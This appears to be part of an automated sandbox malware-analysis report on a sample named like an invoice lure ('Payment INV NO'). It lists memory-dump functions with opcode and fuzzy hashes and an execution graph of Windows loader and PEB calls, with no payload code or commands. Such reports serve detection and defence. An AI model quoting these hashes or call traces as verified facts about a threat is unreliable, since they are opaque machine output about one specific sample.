                                                          • Source File: 00000000.00000002.342194829.0000000006060000.00000040.00000800.00020000.00000000.sdmp, Offset: 06060000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_6060000_Payment INV NO.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 1725be8043daaf26cf7598f75cb2569ae1e8d112876c7d557f1a07d05ed4361f
                                                          • Instruction ID: 1035c324f448fb22349c275f9ed5df5f70555d86709a1f42a92ace316e00c378
                                                          • Opcode Fuzzy Hash: 1725be8043daaf26cf7598f75cb2569ae1e8d112876c7d557f1a07d05ed4361f
                                                          • Instruction Fuzzy Hash: 7BE09B70114240DFD760A609D4407553B59E785710F20C526F25AD339ADF785D9581E5
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0606AC38 Relevance: .0, Instructions: 23COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.342194829.0000000006060000.00000040.00000800.00020000.00000000.sdmp, Offset: 06060000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_6060000_Payment INV NO.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: d3f50fc166f86b187607519beb692ea0ad22ca364622e650c255a7a6c60f1f01
                                                          • Instruction ID: 110335b68898cf5d2a87fa1747d4f3a293156f78d79bd47eeb0d28c7ccc601dd
                                                          • Opcode Fuzzy Hash: d3f50fc166f86b187607519beb692ea0ad22ca364622e650c255a7a6c60f1f01
                                                          • Instruction Fuzzy Hash: E2E04F387502109FD754BB78A45452DBBEAEB4D6613204562E80BD7316EE748C4287A4
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Non-executed Functions

                                                          Function 0606CA98 Relevance: .3, Instructions: 315COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.342194829.0000000006060000.00000040.00000800.00020000.00000000.sdmp, Offset: 06060000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_6060000_Payment INV NO.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: fece3df8e0ddc88944a944e7a16283a1b9fd0eb8d3d61a657b6bc1aa13270988
                                                          • Instruction ID: 26a66f47576aeb6bcedc5a17f67ac4dddd3a38f215e258eb71f03a32ccd2ceb0
                                                          • Opcode Fuzzy Hash: fece3df8e0ddc88944a944e7a16283a1b9fd0eb8d3d61a657b6bc1aa13270988
                                                          • Instruction Fuzzy Hash: 3112E8F1412746FAD330CF65EA9A2993B61F746328B90430AD2611BAD0D7BE194BCF64
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0606F9A8 Relevance: .3, Instructions: 260COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.342194829.0000000006060000.00000040.00000800.00020000.00000000.sdmp, Offset: 06060000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_6060000_Payment INV NO.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: a1187b485aa459ba7bb2e041b85fa17cc0e3249c74ed152bc0452c4d0fa7bfb8
                                                          • Instruction ID: bf554dc1c119cafd66d1d14de9c23c4946600ab2cff422089a6c3e81e4783b7d
                                                          • Opcode Fuzzy Hash: a1187b485aa459ba7bb2e041b85fa17cc0e3249c74ed152bc0452c4d0fa7bfb8
                                                          • Instruction Fuzzy Hash: 6181B035B08219CFDB4CAB79986427E7AB3BFC9710B14882DE407E7388DE349C019B95
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 06014B98 Relevance: .2, Instructions: 238COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.342143956.0000000006010000.00000040.00000800.00020000.00000000.sdmp, Offset: 06010000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_6010000_Payment INV NO.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 8bd54f7df04c93dd82dda7d5490dfc66ceffa846d8ae37848df6e0f5be38c5b0
                                                          • Instruction ID: 92ad2608f3b13bdacc89f8dc71a06ac15fb044ebfabe6baef30e457a2d11b031
                                                          • Opcode Fuzzy Hash: 8bd54f7df04c93dd82dda7d5490dfc66ceffa846d8ae37848df6e0f5be38c5b0
                                                          • Instruction Fuzzy Hash: 20917C70E402098FDF94CFA9C9947DDBFF2BF88704F148529E414AB2A4EB749985CB91
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00BB8D8F Relevance: .2, Instructions: 168COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.333136502.0000000000BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BB0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_bb0000_Payment INV NO.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: c95f1999317a702690ad5d425b782555ff95147e05104f6601f8aa56847e466c
                                                          • Instruction ID: efe9b01d270918a0fdd4bd4e001a658e270087f08de2919bf36d0e1d64daa9a5
                                                          • Opcode Fuzzy Hash: c95f1999317a702690ad5d425b782555ff95147e05104f6601f8aa56847e466c
                                                          • Instruction Fuzzy Hash: 5F714C70A006449FD748EF7AE85464ABBF7FFC8300F24C52AD1459B269EF755D019B60
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00BB8DA0 Relevance: .2, Instructions: 163COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.333136502.0000000000BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BB0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_bb0000_Payment INV NO.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: b96eb05b777548c55d8deabb224a52331350634b83c272183beeeed2649f474f
                                                          • Instruction ID: 50d55ce1efcc2e918532a5c073394f1cfe0ad1c6717c29e4c6138d0fd58e7a8a
                                                          • Opcode Fuzzy Hash: b96eb05b777548c55d8deabb224a52331350634b83c272183beeeed2649f474f
                                                          • Instruction Fuzzy Hash: B8614B70A006049FDB48EF6AE85464ABBF7FFC8300F24C52AD1499B269EF755D059B60
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Execution Graph

                                                          Execution Coverage:0.3%
                                                          Dynamic/Decrypted Code Coverage:100%
                                                          Signature Coverage:66.3%
                                                          Total number of Nodes:2000
                                                          Total number of Limit Nodes:167
                                                          execution_graph 16999 17940fd 17000 1794120 16999->17000 17004 1794151 __cftof 16999->17004 17001 179418e 17000->17001 17000->17004 17005 179429e 17000->17005 17003 17f04ea RtlDebugPrintTimes BaseQueryModuleData 17001->17003 17001->17004 17003->17004 17006 17f0693 17005->17006 17007 17942be 17005->17007 17008 179c600 209 API calls 17006->17008 17014 17d0f48 17007->17014 17009 17f06ab 17008->17009 17009->17009 17012 17942e4 17012->17001 17016 17d0f8e 17014->17016 17015 17942dc 17015->17006 17015->17012 17022 17d95d0 LdrInitializeThunk 17015->17022 17016->17015 17017 17d1023 17016->17017 17036 17d95d0 LdrInitializeThunk 17016->17036 17017->17015 17023 1798239 17017->17023 17021 17d104b 17021->17015 17037 17d95d0 LdrInitializeThunk 17021->17037 17022->17006 17034 1798292 17023->17034 17024 17f308f 17025 17f30a4 17024->17025 17026 17f3093 GetPEB 17024->17026 17029 17982c1 __cftof 17025->17029 17038 17d95d0 LdrInitializeThunk 17025->17038 17027 17b77f0 206 API calls 17026->17027 17027->17025 17029->17021 17030 17d95d0 LdrInitializeThunk 17030->17034 17031 17f2f97 GetPEB 17031->17034 17032 17f2f86 GetPEB 17033 17b77f0 206 API calls 17032->17033 17033->17031 17034->17024 17034->17029 17034->17030 17034->17031 17034->17032 17035 17b4620 206 API calls 17034->17035 17035->17034 17036->17017 17037->17015 17038->17029 16964 17a80fc 16965 17a8119 16964->16965 16966 17a8147 16965->16966 16982 179c600 16965->16982 16970 17a81ca 16966->16970 16974 17d9780 LdrInitializeThunk 16966->16974 16969 17a819c 16969->16970 16976 17c0548 16969->16976 16973 17a81de 16970->16973 16975 17d97a0 LdrInitializeThunk 16970->16975 16974->16969 16975->16973 16977 17c05a4 16976->16977 16978 17c0562 16976->16978 16977->16970 16978->16977 16979 17aeef0 206 API calls 16978->16979 16981 17c057b 16979->16981 16980 17aeb70 3 API calls 16980->16977 16981->16980 16986 179c63e 16982->16986 16983 179c680 __cftof 16983->16966 16984 1807a25 GetPEB 16984->16983 16984->16986 16985 17b4620 206 API calls 16985->16986 16986->16983 16986->16984 16986->16985 16987 1807a7c GetPEB 16986->16987 16991 18079c5 __cftof 16986->16991 16988 17b77f0 206 API calls 16987->16988 16988->16986 16989 1807a09 GetPEB 16990 17b77f0 206 API calls 16989->16990 16990->16983 16991->16983 16991->16989 17039 1792b7e 17040 17ef8af 17039->17040 17041 1792b8f 17039->17041 17044 17d95d0 LdrInitializeThunk 17040->17044 17043 17ef8c6 17043->17043 17044->17043 18391 1792cb0 18392 1792cc2 18391->18392 18392->18392 18393 1792cd7 18392->18393 18395 1792cdb 18392->18395 18396 1792cea 18395->18396 18397 17ef970 18395->18397 18398 1792cef GetPEB 18396->18398 18403 17d95d0 LdrInitializeThunk 18396->18403 18399 17b77f0 206 API calls 18398->18399 18402 1792d00 18399->18402 18401 1792d09 18401->18398 18402->18393 18403->18401 16992 17d9670 16993 17d967a LdrInitializeThunk 16992->16993 18514 17cc532 18515 17cc559 18514->18515 18517 17cc5ec 18515->18517 18518 17d9a00 LdrInitializeThunk 18515->18518 18518->18517 17065 17a6b6b 17071 17b4120 17065->17071 17067 17a6ba5 __cftof 17068 17a6b99 17068->17067 17069 179ad30 207 API calls 17068->17069 17070 17f9219 17069->17070 17070->17070 17072 17b417b 17071->17072 17073 17b416e 17071->17073 17085 17b41b9 17072->17085 17094 17b42a3 17072->17094 17096 17b41da 17072->17096 17101 17b6e30 17072->17101 17073->17072 17075 17b44bb 17073->17075 17106 17d3d43 GetPEB 17075->17106 17077 17fe158 GetPEB 17079 17b4620 206 API calls 17077->17079 17078 17b44cf __cftof 17078->17068 17079->17085 17081 17b4413 __cftof 17081->17068 17082 17fe2a2 GetPEB 17087 17b77f0 206 API calls 17082->17087 17083 17b4405 17083->17081 17083->17082 17084 17fe148 GetPEB 17084->17077 17084->17083 17085->17077 17085->17083 17085->17084 17092 17b6e30 207 API calls 17085->17092 17085->17096 17091 17fe2b4 17087->17091 17088 17b4292 GetPEB 17090 17b4620 206 API calls 17088->17090 17089 17fe242 17093 17aeb70 3 API calls 17089->17093 17090->17094 17091->17091 17092->17085 17093->17083 17094->17083 17109 17952a5 17094->17109 17095 17b44f9 17095->17083 17137 17d95d0 LdrInitializeThunk 17095->17137 17096->17083 17096->17088 17096->17094 17097 17fe1f3 17096->17097 17097->17068 17099 17fe282 GetPEB 17100 17b77f0 206 API calls 17099->17100 17100->17083 17105 17b6e8a 17101->17105 17103 17b70ef __cftof 17103->17085 17104 17b72dc 17104->17085 17105->17104 17138 17b746d 17105->17138 17107 17b4620 206 API calls 17106->17107 17108 17d3d89 17107->17108 17108->17078 17115 17952ba 17109->17115 17110 17aeef0 206 API calls 17110->17115 17111 17f0f60 17112 17aeef0 206 API calls 17111->17112 17119 17952e9 17111->17119 17114 17f0f75 17112->17114 17113 17cf0bf 215 API calls 17113->17115 17116 17aeb70 3 API calls 17114->17116 17115->17110 17115->17111 17115->17113 17117 17f0e4c GetPEB 17115->17117 17115->17119 17120 17f0ed7 17115->17120 17121 17aeb70 GetPEB GetPEB LdrInitializeThunk 17115->17121 17147 17d95d0 LdrInitializeThunk 17115->17147 17148 17d95d0 LdrInitializeThunk 17115->17148 17116->17119 17118 17aeef0 206 API calls 17117->17118 17118->17115 17119->17089 17119->17095 17122 17aeb70 3 API calls 17120->17122 17121->17115 17123 17f0f10 17122->17123 17124 17f0f31 17123->17124 17149 17d95d0 LdrInitializeThunk 17123->17149 17124->17119 17150 17d95d0 LdrInitializeThunk 17124->17150 17127 17f0e92 GetPEB 17130 17b77f0 206 API calls 17127->17130 17129 17f0f20 GetPEB 17135 17b77f0 206 API calls 17129->17135 17130->17115 17132 17f0ec1 GetPEB 17134 17b77f0 206 API calls 17132->17134 17133 17f0f44 GetPEB 17136 17b77f0 206 API calls 17133->17136 17134->17115 17135->17124 17136->17119 17137->17099 17139 17b7486 17138->17139 17140 17b7473 17138->17140 17141 17aeb70 3 API calls 17139->17141 17142 17b748e 17139->17142 17140->17103 17141->17142 17142->17140 17146 17d95d0 LdrInitializeThunk 17142->17146 17144 17ff93f GetPEB 17145 17b77f0 206 API calls 17144->17145 17145->17140 17146->17144 17147->17127 17148->17132 17149->17129 17150->17133 17195 1794360 17197 1794386 17195->17197 17201 17f072a 17195->17201 17196 179441f __cftof 17197->17196 17197->17201 17202 1794439 17197->17202 17207 17c9b10 17201->17207 17203 179445d 17202->17203 17204 17944e7 __cftof 17202->17204 17203->17204 17205 17f088f GetPEB 17203->17205 17204->17197 17206 17b77f0 206 API calls 17205->17206 17206->17203 17208 17c9b1f 17207->17208 17210 17c9b5e 17207->17210 17208->17210 17211 1797055 17208->17211 17212 179708e 17211->17212 17213 1797075 RtlDebugPrintTimes 17211->17213 17219 17970c0 17212->17219 17213->17212 17216 179709c GetPEB 17217 17b77f0 206 API calls 17216->17217 17218 17970b0 __cftof 17217->17218 17218->17210 17220 1797096 17219->17220 17228 17970c9 17219->17228 17220->17216 17220->17218 17221 17970e2 17221->17220 17222 17f22d2 GetPEB 17221->17222 17223 17b77f0 206 API calls 17222->17223 17224 17f22e5 17223->17224 17224->17224 17225 1797113 GetPEB 17227 17b77f0 206 API calls 17225->17227 17227->17228 17228->17221 17228->17225 17229 17d95d0 LdrInitializeThunk 17228->17229 17229->17228 18527 1794a20 18528 17b7d50 GetPEB 18527->18528 18529 1794a2f 18528->18529 18530 17f0a80 GetPEB 18529->18530 18531 1794a37 18529->18531 18533 17f0a93 18530->18533 18532 1794a7a 18531->18532 18531->18533 18549 17c9b82 18532->18549 18535 1794a89 18533->18535 18553 1799240 18533->18553 18536 1794a93 18535->18536 18537 17f0ad2 18535->18537 18539 1794a9d 18536->18539 18541 17f0ada 18536->18541 18573 17d95d0 LdrInitializeThunk 18537->18573 18543 17f0ae7 18539->18543 18544 1794aa7 GetPEB 18539->18544 18542 17c9b10 210 API calls 18541->18542 18542->18543 18574 17a0840 18543->18574 18546 17b77f0 206 API calls 18544->18546 18548 1794ab8 18546->18548 18547 17f0af4 18547->18547 18551 17c9b8e 18549->18551 18550 17c9bbc 18550->18535 18551->18550 18586 1799100 18551->18586 18554 179924c 18553->18554 18555 179925f 18554->18555 18597 17d95d0 LdrInitializeThunk 18554->18597 18598 1799335 18555->18598 18559 1799335 LdrInitializeThunk 18560 1799276 18559->18560 18603 17d95d0 LdrInitializeThunk 18560->18603 18562 179927e GetPEB 18563 17b77f0 206 API calls 18562->18563 18564 179929a GetPEB 18563->18564 18565 17b77f0 206 API calls 18564->18565 18566 17992b6 GetPEB 18565->18566 18567 17b77f0 206 API calls 18566->18567 18569 17992d2 18567->18569 18568 1799330 18569->18568 18570 1799305 GetPEB 18569->18570 18571 17b77f0 206 API calls 18570->18571 18572 179931f 18571->18572 18572->18535 18573->18541 18575 17a088d 18574->18575 18576 17a0857 18574->18576 18575->18547 18576->18575 18606 17a08d3 18576->18606 18579 17a0886 18614 17aec7f 18579->18614 18581 17a08b8 18583 17a08d3 241 API calls 18581->18583 18584 17a08c5 18583->18584 18584->18579 18637 179f4e3 18584->18637 18587 179910c __cftof 18586->18587 18588 1799136 GetPEB 18587->18588 18589 1799127 GetPEB 18587->18589 18590 1799149 __cftof 18588->18590 18589->18588 18591 1799151 18589->18591 18590->18550 18590->18590 18592 17b7d50 GetPEB 18591->18592 18593 17f37d1 GetPEB 18591->18593 18594 17991c5 18592->18594 18593->18590 18594->18593 18595 17991cd 18594->18595 18595->18590 18596 17c9b82 GetPEB 18595->18596 18596->18595 18597->18555 18604 17d95d0 LdrInitializeThunk 18598->18604 18600 1799342 18605 17d95d0 LdrInitializeThunk 18600->18605 18602 179926b 18602->18559 18603->18562 18604->18600 18605->18602 18607 17a08e4 18606->18607 18613 17a087c 18607->18613 18642 17a28ae 18607->18642 18611 17a092b 18687 17a28fd 18611->18687 18613->18579 18613->18581 18629 17c19b8 18613->18629 18616 17aec8f 18614->18616 18626 17aeca4 18614->18626 18615 17aecdf 18618 17d0413 2 API calls 18615->18618 18616->18615 18616->18626 18798 17d37f5 18616->18798 18619 17aece6 18618->18619 18620 17aeced 18619->18620 18623 17c9b10 210 API calls 18619->18623 18621 17aecfb 18620->18621 18794 17c02d6 18620->18794 18622 17b77f0 206 API calls 18621->18622 18625 17aed09 18622->18625 18623->18620 18625->18626 18627 17b77f0 206 API calls 18625->18627 18626->18575 18628 17cc291 18627->18628 18628->18575 18636 17c19d5 18629->18636 18630 17aeef0 206 API calls 18630->18636 18631 17c1b0c 18803 17bf460 18631->18803 18633 17c1b3c 18633->18581 18634 17aeb70 GetPEB GetPEB LdrInitializeThunk 18634->18636 18635 17c1a49 18635->18581 18636->18630 18636->18631 18636->18634 18636->18635 18638 17aeef0 206 API calls 18637->18638 18639 179f501 18638->18639 18640 17aeb70 3 API calls 18639->18640 18641 179f50e 18640->18641 18641->18579 18643 17b7d50 GetPEB 18642->18643 18644 17a28b8 18643->18644 18645 17f7689 GetPEB 18644->18645 18646 17a28c5 18644->18646 18647 17f769c GetPEB 18645->18647 18646->18647 18648 17a28d5 18646->18648 18647->18648 18649 17f76af 18647->18649 18650 17aeef0 206 API calls 18648->18650 18651 17b7d50 GetPEB 18649->18651 18652 17a28df 18650->18652 18654 17f76b4 18651->18654 18653 17b7d50 GetPEB 18652->18653 18655 17a28e6 18653->18655 18654->18648 18656 17f76b8 GetPEB 18654->18656 18657 17f76ed GetPEB 18655->18657 18658 17a28ee 18655->18658 18656->18648 18659 17f7702 GetPEB 18657->18659 18658->18659 18660 17a0924 18658->18660 18659->18660 18661 17f7715 18659->18661 18665 179f51d GetPEB 18660->18665 18662 17b7d50 GetPEB 18661->18662 18663 17f771a 18662->18663 18663->18660 18664 17f771e GetPEB 18663->18664 18664->18660 18666 179f54e 18665->18666 18667 179f563 18666->18667 18679 179f591 18666->18679 18703 17a0225 18666->18703 18669 17aeef0 206 API calls 18667->18669 18677 179f579 18667->18677 18669->18677 18670 179f737 RtlDebugPrintTimes 18670->18677 18671 179f60d __cftof 18671->18611 18672 179f587 18673 17aeb70 3 API calls 18672->18673 18673->18679 18676 17f5d1d 18737 17d0413 18676->18737 18677->18670 18677->18672 18677->18676 18714 17a8b80 18677->18714 18721 17a8800 GetPEB 18677->18721 18723 17a0100 18677->18723 18680 179f59c 18679->18680 18685 17b77f0 206 API calls 18679->18685 18686 179f51d 230 API calls 18679->18686 18680->18671 18680->18676 18682 17aec7f 213 API calls 18680->18682 18709 17a008a 18680->18709 18682->18680 18684 17f5d4b 18684->18684 18685->18679 18686->18679 18688 17aeb70 3 API calls 18687->18688 18689 17a2912 18688->18689 18690 17a2923 18689->18690 18691 17f7750 18689->18691 18693 17b7d50 GetPEB 18690->18693 18692 179b1e1 4 API calls 18691->18692 18694 17a2928 18692->18694 18693->18694 18695 17a2930 18694->18695 18696 17f7762 GetPEB 18694->18696 18697 17a293e 18695->18697 18698 17f7775 GetPEB 18695->18698 18696->18698 18697->18613 18698->18697 18706 17a0231 18703->18706 18705 17a02f5 18705->18667 18706->18705 18743 17a0315 18706->18743 18747 17afc01 18706->18747 18763 17a0c30 18706->18763 18712 17a0090 18709->18712 18713 17a00cb 18709->18713 18710 17a0100 210 API calls 18711 17a00f0 18710->18711 18711->18680 18712->18710 18712->18713 18713->18680 18715 17aeef0 206 API calls 18714->18715 18716 17a8bbd 18715->18716 18717 17a8bcb 18716->18717 18718 17a8be8 RtlDebugPrintTimes 18716->18718 18719 17aeb70 3 API calls 18717->18719 18718->18716 18720 17a8bd5 __cftof 18719->18720 18720->18677 18722 17a883d 18721->18722 18722->18677 18725 17a010c 18723->18725 18724 17a015c 18724->18677 18725->18724 18726 17f6145 18725->18726 18727 17f6165 GetPEB 18725->18727 18728 17f614a GetPEB 18725->18728 18730 17f61a2 GetPEB 18725->18730 18781 17d97a0 LdrInitializeThunk 18725->18781 18782 17d95d0 LdrInitializeThunk 18725->18782 18726->18728 18731 17b77f0 206 API calls 18727->18731 18729 17b77f0 206 API calls 18728->18729 18733 17f615a 18729->18733 18734 17b8e10 206 API calls 18730->18734 18735 17f6176 18731->18735 18733->18727 18734->18735 18735->18724 18735->18730 18738 17d041f 18737->18738 18742 17d043a 18737->18742 18741 17d042f 18738->18741 18783 17d0440 18738->18783 18787 17d97a0 LdrInitializeThunk 18741->18787 18742->18684 18744 17a03dc __cftof 18743->18744 18745 17a0360 __cftof 18743->18745 18744->18706 18745->18744 18746 17b4620 206 API calls 18745->18746 18746->18744 18767 17ed08c 18747->18767 18749 17afc0d GetPEB 18750 17fbe4a 18749->18750 18751 17afc25 18749->18751 18750->18751 18752 17fbe53 GetPEB 18750->18752 18753 17fbe66 GetPEB 18751->18753 18762 17afc33 RtlDebugPrintTimes 18751->18762 18752->18751 18754 17fbe79 18753->18754 18753->18762 18756 17b7d50 GetPEB 18754->18756 18758 17fbe7e 18756->18758 18757 17afc56 18768 17afc77 GetPEB 18757->18768 18759 17fbe82 GetPEB 18758->18759 18758->18762 18759->18762 18762->18757 18764 17a0c74 18763->18764 18765 17a0cb6 18764->18765 18766 17afc01 13 API calls 18764->18766 18765->18706 18766->18764 18767->18749 18769 17afc88 18768->18769 18770 17fbec3 18768->18770 18772 17afc97 18769->18772 18773 17fbee1 GetPEB 18769->18773 18770->18769 18771 17fbecc GetPEB 18770->18771 18771->18769 18775 179b1e1 4 API calls 18772->18775 18776 17afca6 18772->18776 18773->18772 18774 17fbef4 18773->18774 18781->18725 18782->18725 18784 17d0452 18783->18784 18788 17d0463 18784->18788 18786 17d0459 18786->18741 18787->18742 18789 17d0471 18788->18789 18790 17d04a0 18789->18790 18791 17cbdfc LdrInitializeThunk 18789->18791 18790->18786 18792 17d0492 18791->18792 18793 17cbdfc LdrInitializeThunk 18792->18793 18793->18790 18795 17c02e9 18794->18795 18796 17c02e1 18794->18796 18795->18621 18797 179ad30 207 API calls 18796->18797 18797->18795 18799 17d3807 18798->18799 18800 17d3868 18799->18800 18801 17d3858 GetPEB 18799->18801 18800->18615 18802 17b77f0 206 API calls 18801->18802 18802->18800 18808 17bf4d3 18803->18808 18804 17bf703 18804->18633 18807 17bf5c0 18807->18633 18808->18804 18810 17bf582 18808->18810 18813 17bf525 18808->18813 18814 180461d 18808->18814 18818 17bf590 18808->18818 18810->18804 18811 17bf6e1 18810->18811 18810->18818 18834 1798d29 18811->18834 18813->18818 18822 17bf716 18813->18822 18815 17c19b8 215 API calls 18814->18815 18814->18818 18819 1804638 18815->18819 18816 1804723 18817 17bf651 18817->18816 18817->18818 18831 17c1cc8 18817->18831 18818->18804 18826 17bf708 18818->18826 18821 179f4e3 206 API calls 18819->18821 18821->18818 18824 17bf563 18822->18824 18825 17bf72c 18822->18825 18823 17bf754 GetPEB 18823->18824 18824->18810 18824->18811 18824->18817 18824->18818 18825->18823 18825->18824 18827 17bf70f 18826->18827 18828 17bf710 18826->18828 18827->18807 18829 17aec7f 213 API calls 18828->18829 18830 17bf715 18829->18830 18830->18807 18838 17c1d47 18831->18838 18833 17c1d04 __cftof 18833->18818 18835 1798d49 18834->18835 18836 17c1d47 3 API calls 18835->18836 18837 1798d70 __cftof 18836->18837 18837->18804 18839 17c1d5a 18838->18839 18840 17c1d6a 18838->18840 18842 17b31f0 18839->18842 18840->18833 18843 17b3229 18842->18843 18845 17b32de __cftof 18842->18845 18843->18845 18846 17dec60 18843->18846 18845->18840 18847 17dec80 18846->18847 18848 17dec84 18847->18848 18850 17deca6 RtlDebugPrintTimes 18847->18850 18849 17db58e __cftof 2 API calls 18848->18849 18851 17dec90 18849->18851 18850->18851 18851->18845 17242 17a9467 17245 17a9499 17242->17245 17244 17a9628 17245->17244 17252 17a95b1 17245->17252 17254 17a8f87 17245->17254 17247 17a9612 17281 17ab02a GetPEB 17247->17281 17248 17a95d3 17248->17247 17277 17a8f04 17248->17277 17252->17244 17252->17248 17271 17a8d5c 17252->17271 17259 17a8fac 17254->17259 17256 17f9e94 17260 17a906b 17256->17260 17292 17d9a00 LdrInitializeThunk 17256->17292 17258 17f9eb4 17258->17258 17259->17260 17291 17d9a00 LdrInitializeThunk 17259->17291 17260->17244 17261 17a9136 17260->17261 17262 17a9151 17261->17262 17263 17a9261 17261->17263 17262->17263 17264 17a91ff 17262->17264 17293 17d9a00 LdrInitializeThunk 17262->17293 17263->17252 17267 17a9258 17264->17267 17294 17d8ec7 GetPEB 17264->17294 17267->17263 17298 17d9a00 LdrInitializeThunk 17267->17298 17269 17a92d4 17269->17263 17299 17d9a00 LdrInitializeThunk 17269->17299 17272 17a8d77 17271->17272 17300 17cbdfc 17272->17300 17274 17a8d98 17275 17cbdfc LdrInitializeThunk 17274->17275 17276 17a8dab 17275->17276 17276->17248 17278 17a8f13 17277->17278 17279 17a8f17 17277->17279 17278->17247 17279->17278 17312 17cfab0 17279->17312 17282 17fa60b 17281->17282 17283 17ab046 17281->17283 17282->17283 17284 17fa614 GetPEB 17282->17284 17285 17fa627 GetPEB 17283->17285 17286 17ab054 17283->17286 17284->17283 17285->17286 17287 17fa63a 17285->17287 17286->17244 17288 17b7d50 GetPEB 17287->17288 17289 17fa63f 17288->17289 17289->17286 17290 17fa643 GetPEB 17289->17290 17290->17286 17291->17256 17292->17258 17293->17264 17295 17d8ef0 17294->17295 17296 17d8f01 __cftof 17294->17296 17297 17c4e70 RtlDebugPrintTimes 17295->17297 17296->17267 17297->17296 17298->17269 17299->17263 17301 17cbe0e 17300->17301 17302 17cbe1a 17301->17302 17304 17cbe3e 17301->17304 17305 17cbe26 17302->17305 17307 17cbe62 17302->17307 17304->17305 17306 17cbe62 LdrInitializeThunk 17304->17306 17305->17274 17306->17305 17309 17cbe76 17307->17309 17311 17d9a00 LdrInitializeThunk 17309->17311 17310 17cbe9c 17310->17305 17311->17310 17313 17cfb14 17312->17313 17314 17cfac2 17312->17314 17313->17279 17315 17aeef0 206 API calls 17314->17315 17316 17cfacd 17315->17316 17317 17cfadf 17316->17317 17318 17cfb18 17316->17318 17319 17aeb70 3 API calls 17317->17319 17340 17a6d90 17318->17340 17321 17cfaf1 17319->17321 17321->17313 17322 17cfafa GetPEB 17321->17322 17322->17313 17323 17cfb09 17322->17323 17334 17aff60 17323->17334 17324 17cfb90 17327 17cfbe4 17324->17327 17328 17cfc89 17324->17328 17403 17cfd22 17324->17403 17327->17328 17330 17cfd22 207 API calls 17327->17330 17333 17cfc4b 17327->17333 17328->17279 17331 17cfcb2 17330->17331 17331->17328 17407 17cfd9b 17331->17407 17333->17328 17350 17a70f0 17333->17350 17335 17aff94 17334->17335 17336 17aff6d 17334->17336 17335->17313 17336->17335 17337 17aff80 GetPEB 17336->17337 17337->17335 17338 17aff8f 17337->17338 17413 17b0050 17338->17413 17341 17a6dba 17340->17341 17349 17a6da4 17340->17349 17421 17d2e1c 17341->17421 17344 17aeef0 206 API calls 17345 17a6dca 17344->17345 17346 17a6dde 17345->17346 17425 179db60 17345->17425 17348 17aeb70 3 API calls 17346->17348 17348->17349 17349->17324 17351 17a7145 17350->17351 17352 17a7446 17351->17352 17355 17a71d8 17351->17355 17358 17a6d90 256 API calls 17351->17358 17382 17a72d6 17351->17382 17352->17328 17353 17a76e2 207 API calls 17354 17f9584 17353->17354 17354->17354 17356 17a75c9 17355->17356 17357 17a71e9 17355->17357 17355->17382 17359 179db60 256 API calls 17356->17359 17363 17a7256 17357->17363 17368 17f94ba 17357->17368 17935 17a6df3 17357->17935 17365 17a71b4 17358->17365 17361 17f943d 17359->17361 17367 17f9465 17361->17367 17371 179ec9b 220 API calls 17361->17371 17361->17382 17366 17a76e2 207 API calls 17363->17366 17379 17a72b0 17363->17379 17381 17a7303 17363->17381 17363->17382 17364 17a7345 17952 17a75ce 17364->17952 17365->17352 17365->17355 17377 17a739d 17365->17377 17378 17f940d 17365->17378 17366->17381 17375 179ec9b 220 API calls 17367->17375 17367->17381 17367->17382 17383 17a34b1 258 API calls 17368->17383 17369 17d2e1c 211 API calls 17374 17a7321 17369->17374 17371->17367 17372 17a6ffd 225 API calls 17372->17363 17380 17aeef0 206 API calls 17374->17380 17375->17381 17377->17382 17388 17a73c0 17377->17388 17990 17a31c1 17377->17990 17385 17a6d90 256 API calls 17378->17385 17379->17382 18006 17a9d0b 17379->18006 17386 17a732c 17380->17386 17381->17364 17381->17369 17381->17379 17381->17382 17382->17352 17382->17353 17401 17a7417 17383->17401 17385->17377 17389 17cfd22 207 API calls 17386->17389 17387 17a736d 17390 17a75ce 207 API calls 17387->17390 17395 17a76e2 207 API calls 17388->17395 17393 17a7334 17389->17393 17394 17a7378 17390->17394 17392 17a7410 17392->17401 18010 17a2f9a 17392->18010 17396 17aeb70 3 API calls 17393->17396 17956 17a34b1 17394->17956 17395->17379 17396->17364 17399 17a76e2 207 API calls 